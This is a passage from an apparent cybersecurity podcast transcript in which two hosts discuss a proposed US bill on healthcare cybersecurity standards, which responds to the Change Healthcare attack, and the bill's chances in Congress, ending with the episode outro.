And then the final one was actually directly in response to that Change Healthcare attack, where the Secretary of the Health and Human Services Department had to, I don't want to say extrajudicially, but they went out of their way, in a way that technically they weren't allowed to, I guess, in providing accelerated Medicare payments because of all that disruption. And so this codifies the Secretary's authority to provide advanced and accelerated Medicare payments in the event of a cybersecurity disruption, which was necessary during that Change Healthcare attack. So it's getting that in writing so that our good friends at the Supreme Court, who like blowing things up, can't blow that up sometime in the future, too. But either way, on the face of it, the bill is actually pretty short. I'm used to, like, skimming through or reading through, well, a page and a half for the summary, but even the text itself was only like 50 pages, and most of it's kind of the intro and outro bits. So what I'm getting at is, it's not as in-depth as other bills I've read, where they lay out specific requirements on, you know, you need MFA, you need to follow NIST 800-53, all the controls and things like that. It's basically just starting high level with, okay, you need some cybersecurity standards, I guess they'll probably lean on NIST or someone to come up with those, you need documented risk analysis and a BCDR plan, and you need to test it. And that's basically it. And if you lie to us about, yeah, we're doing these things, then we throw your executives in prison. That's basically all this law is. Now, the cynic in me says that this probably won't pass, and that's strictly because it was only introduced by two Democrats, and generally you need at least one, like, Republican sponsor to have any semblance of a chance of there being some bipartisan cooperation. So the fact that there wasn't any...
Corey Nachreiner 44:30
It's hard to imagine how this would be partisan, other than, I guess, one party is just generally anti-regulation and anything that hurts business profit. Yeah, I'm hoping, but you're probably right. Yeah, we both can hope. It is interesting to see more and more laws and bills come, whether they pass or not, that are cybersecurity related. Between the White House's strategy and other nation-states' strategies, there's lots of legal focus, government focus, on trying to get a handle around the problem. Hopefully we will be able to pass things that help protect everyone. But no, you're not wrong. I'm skeptical that Congress can pass much, other than half-hearted attempts to maybe keep the government open for 90 more days, over and over again, while they argue about what parts of the government should exist.
Marc Laliberte 45:24
Yeah, because, fundamentally, healthcare is critical infrastructure, like, and it is one of the more critical infrastructures, in that if we have a major disruption, like a widespread disruption to healthcare, that's pretty catastrophic to our population and citizens in this country. And so this is one area where I am a little more comfortable with, like, leading with a bit of teeth, and not just incentives, but also the we're-going-to-throw-your-executives-in-prison-if-you-screw-this-up kind of way. Like, if we can do that for financial institutions and lying about financial records, we sure as heck should be able to do it for cybersecurity requirements for healthcare. I feel like that's, you know, orders of magnitude more acceptable. But whatever, we'll see, fingers crossed, I could be proven wrong. It could just be because I think they're the two, like, heads of their little committees, and maybe that's the reason they were on it. But I guess we will wait and see if anything comes of this bill and gives any meaningful improvements to cybersecurity in healthcare. Hey everyone, thanks again for listening. As always, if you enjoyed this episode, don't forget to rate, review, and subscribe. If you have any questions on today's topics or suggestions for future episode topics, you can reach out to us on Instagram, we're @watchguard_technologies. Thanks again for listening, and you will hear from us next week.